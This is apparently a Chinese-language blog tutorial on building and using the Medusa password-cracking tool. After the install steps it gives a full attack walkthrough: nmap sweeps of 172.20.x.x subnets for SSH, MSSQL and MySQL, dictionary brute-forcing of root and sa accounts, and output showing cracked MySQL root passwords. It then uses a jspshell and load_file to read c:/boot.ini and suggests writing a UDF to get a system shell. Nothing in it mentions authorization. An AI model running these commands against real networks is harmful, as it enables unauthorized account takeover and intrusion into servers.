***linux環境的網絡,口令破解是必不可少的。接下來介紹一款優秀的口令破解工具,首先先下載破解工具:
medusa 是一款不錯的口令破解軟件,速度也不錯,使用的時候,需要提供破解的ip,medusa本身不提供掃描功能,讀取ip也只能爲
單個ip,所以需要和nmap之類軟件配合使用獲取開放端口的ip列表。再設置要破解的用戶名字典和口令字典,即可破解。
./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.ttx
vnc 爲要跑的開放了vnc的ip列表。
name.txt 用戶名字典
pass.txt 口令字典
r.vnc.txt 保存結果的文件。
wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-
2.0.tar.gz
如果沒有libssh2就裝個http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
如果裝錯了就make uninstall再重裝個,裝完rm -rf libssh2-1.2.2,下面是安裝方法:
tar zxvf medusa-2.0.tar.gz
cd medusa-2.0
./configure
當前的版本是2.0,不過有個疑似bug的地方。在centos下,默認編譯的時候沒有ssh模塊,但是看configure –help的時候,該模塊
默認是yes的,也就是應該有的。需要手動編譯時再指定一下這個模塊:
./configure –prefix=/tools/medusa –enable-module-ssh=yes
看看ssh在裏面沒->enable_module_ssh,沒有的話編譯是沒有ssh模塊的
./make
./make install
要是ubuntu,就sudo apt-get install libssh2,要是linux就像上面這麼麻煩了。
裝好後用medusa -d查看各個模塊是否正常,經常會現如下錯誤:
+ ssh.mod : Couldn’t load “/usr/local/lib/medusa/modules/ssh.mod” [libssh2.so.1: cannot open shared object file:
No such file or directory
雖然已安裝了libssh但是找不到ssh路徑,這需要我們手工添加一個。etc 目錄 下面有一個 叫 ld.so.conf 的文件,指明 so 文件
默認路徑 ,一般的是 lib 和 usr lib ,編譯出來的裝在 usr local lib下了,所以要加一個,然後運行ldconfig,操作如下:
cat /etc/ls.do.conf
cat /etc/ld.so.conf
include ld.so.conf.d/*.conf
ls ld.so.conf.d/
echo /usr/local/lib > /etc/ld.so.conf.d/local.conf
cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib
ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.s
o.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2
.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1
ldconfig
最後再查詢一下有沒有ldd /usr/local/lib/medusa/modules/ssh.mod
配置好了路徑後,再用-d看看ssh模塊是否正常了。接下來就是medusa具體用法了:
# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #
我們再看看medusa有哪些模塊支持什麼功能的破解:
# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
Available modules in “.” :
Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0
支持的破解項目還是非常全面的,非常有利於***。首先我們確定目標,掃描開放ssh的機器,隨便找個段掃描一下吧。掃描整個段
開了22端口的機器, 並且判斷服務版本,保存到ssh文件中:
nmap -sV -p22 -oG ssh 172.20.3.0/24
Interesting ports on 172.20.3.132:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:16:B9:DB (Unknown)
Interesting ports on 172.20.3.133:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:09:E5 (Unknown)
Interesting ports on 172.20.3.134:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:72:49 (Unknown)
………………
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:77:7A (Unknown)
Interesting ports on 172.20.3.148:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:79:D0 (Unknown)
Interesting ports on 172.20.3.150:
PORT STATE SERVICE VERSION
22/tcp closed ssh
MAC Address: 00:1E:4F:16:B8:2F (Unknown)
Interesting ports on 172.20.3.151:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1E:4F:16:B9:EF (Unknown)
Interesting ports on 172.20.3.152:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)
Interesting ports on 172.20.3.254:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)
Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds
cat ssh
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 17
2.20.3.0/24
Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds
類似這樣的,這裏我們要整理一下,把開了ssh的IP整理出來,現在明白oG保存的意義所在了
grep 22/open ssh | cut -d ” ” -f 2 >>ssh1.txt
cat ssh1.txt
172.20.3.28
172.20.3.61
172.20.3.62
172.20.3.63
172.20.3.64
加載ssh模塊進行ssh破解
medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of
51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of
51 complete)
………………
破解需要漫長的等待,ssh破解並不快,建議字典包含十幾個到100個以內的常見密碼就可以了,否則跑的時間比較長。或者配置-G
、-T提高些一些破解速度。
推薦還是掃一掃sql…
nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 //掃描172.20.0.1-172.20.5.254
grep 1433/open mssql | cut -d ” ” -f 2 >>mssql.txt
medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql
沒有破出來,再試試破mysql:
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log //結果輸出到pass.log
cat pass.log
# Medusa v.2.0 (2010-06-26 10:42:32)
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log
ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]
ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]
# Medusa has finished (2010-06-26 10:55:11).
運氣還不錯,接着利用jspshell連上172.20.1.115的mysql操作:
select load_file(‘c:/boot.ini’);
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)
rdisk(0)partition(2)\WINDOWS=”Windows Server 2003, Enterprise” /fastdetect /NoExecute=OptIn
原來是win2k3,可以繼續寫入個udf獲得shell…
最後附上官方說明:http://www.foofus.net/~jmk/medusa/ChangeLog